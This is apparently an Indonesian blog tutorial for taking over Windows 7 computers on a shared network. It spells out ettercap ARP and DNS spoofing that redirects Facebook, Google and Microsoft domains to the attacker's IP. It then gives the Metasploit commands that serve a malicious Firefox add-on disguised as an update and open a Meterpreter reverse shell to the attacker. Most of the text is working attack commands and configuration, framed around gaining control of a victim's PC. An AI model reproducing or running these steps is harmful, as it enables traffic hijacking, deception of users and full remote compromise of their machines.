Untuk memasuki system windows 7 ada banyak cara salah satunya memanipulasi add on dari mozilla ketika menjalankan exploit ini browser korban akan muncul dialog penginstalan add on mozilla ketika korban klik install dan menjalankan payload dengan hak akses penuh pada komputer korban dan berhasil telah saya coba pad lab saya
berikut POC nya
Atur dulu dns spoof nya
buka console lalu ketikkan perintah
locate etter.dns
untuk mengetahui letak pengaturan ettercap
kemudian atur dns spoofnya di pengaturan etter.dns
gedit /usr/local/share/ettercap/etter.dns
rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.74
tambahkan facebook di bagian ini
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
facebook.com A 192.168.1.74
*facebook.com A 192.168.1.74
www.facebook.com A 192.168.1.74
google.com A 192.168.1.74
*google.com A 192.168.1.74
www.google.com A 192.168.1.74
microsoft.com A 192.168.1.74
*.microsoft.com A 192.168.1.74
www.microsoft.com PTR 192.168.1.74 # Wildcards in PTR are not allowed
Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita
KALAU INGIN SEMUA SITUS DI SPOOFING CUKUP TAMBAHKAN
*A (ip pc anda) misal = *A 192.168.1.74
pada bagian bawah sendiri.Di bawah #vim:ts=8:noexpandtab
setelah itu save
Ketika sudah di set buka msfconsole pada terminal backtrack
Tunggu hingga metasploit muncul dan ketikkan perintah exploitnya
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload windows/meterpreter/reverse_tcp
set addonname Upadating
set srvhost 192.168.1.74 --> ip lokal kita
set srvport 80
set uripath /
set lhost 192.168.1.74 --> ip lokal kita
set lport 443
exploit
sekarang kita coba untuk menjalankan spoofing
buka terminal baru lalu ketikkan di terminal
ettercap -Tqi wlan0 -P dns_spoof -M arp // //
ket = wlan0 adalah interface wifi saya untuk mengeceknya bisa ketikkan airmon-ng untuk melihat interface nya
Tunggu korban membuka facebook.com/google.com supaya di spoofing ke malicious ip kita
dan sukses korban membuka google.com yang nantinya di alihkan ke malicious ip kita
dan tunggu hingga korban menginstall add on malicious tadi
dan sessions telah di buka
tekan ctrl + c karna session 1 telah di buka
ketikkan sessions -i 1 untuk membuka sesi pertama
dan pc tersebut berada di tangan kamu
Post a Comment